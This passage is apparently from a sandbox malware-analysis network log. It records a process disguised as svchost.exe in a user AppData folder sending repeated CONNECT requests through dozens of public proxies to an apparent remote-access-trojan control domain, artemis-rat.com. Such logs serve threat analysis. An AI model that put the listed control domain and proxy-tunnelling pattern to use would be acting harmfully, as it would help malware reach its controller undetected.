Mar 9, 2024 13:14:34.997155905 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.152012110 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3256	192.168.2.5	60485	172.64.86.217	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.006881952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.161397934 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3257	192.168.2.5	60492	172.67.182.153	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.006905079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.161145926 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3258	192.168.2.5	59169	211.253.24.57	3334	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.007158041 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3259	192.168.2.5	60493	104.19.235.10	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.007433891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.162103891 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3260	192.168.2.5	60482	104.20.205.191	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.007446051 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.162166119 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3261	192.168.2.5	60498	45.12.31.104	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.007523060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.162347078 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3262	192.168.2.5	60501	104.23.100.73	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.007539988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.162270069 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3263	192.168.2.5	60436	203.222.24.36	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.007675886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3264	192.168.2.5	60022	162.240.239.103	42771	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.007710934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.176986933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3265	192.168.2.5	60434	45.81.232.17	53288	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.008259058 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.833146095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.833714962 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.849400997 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3266	192.168.2.5	59976	115.96.208.124	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.008321047 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:35.427756071 CET	72	IN	HTTP/1.1 200 Connection Established Proxy-Agent: Fortinet-Proxy/1.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3267	192.168.2.5	55433	164.92.237.188	63722	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.008618116 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.176990032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3268	192.168.2.5	59901	111.59.4.88	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.010195971 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.333445072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.940727949 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:36 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3269	192.168.2.5	60529	104.27.26.29	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.010843039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.165360928 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3270	192.168.2.5	60009	209.222.97.30	62543	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.010870934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3271	192.168.2.5	59083	103.184.19.122	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.011904955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.145850897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3272	192.168.2.5	55520	195.177.217.131	52858	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.011905909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.373888016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3273	192.168.2.5	60470	159.223.166.21	47460	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.014146090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.677243948 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.374583006 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.846276045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3274	192.168.2.5	60543	172.67.181.37	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.016007900 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.170198917 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3275	192.168.2.5	60459	8.219.179.237	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.018940926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3276	192.168.2.5	55575	201.184.159.28	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.044235945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3277	192.168.2.5	55525	203.202.253.108	5020	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.087037086 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.145982027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3278	192.168.2.5	60397	42.49.148.167	9001	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.087202072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.495260000 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3279	192.168.2.5	60579	172.64.152.98	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:35.100330114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.254961014 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:35 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3280	192.168.2.5	60407	103.120.6.46	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
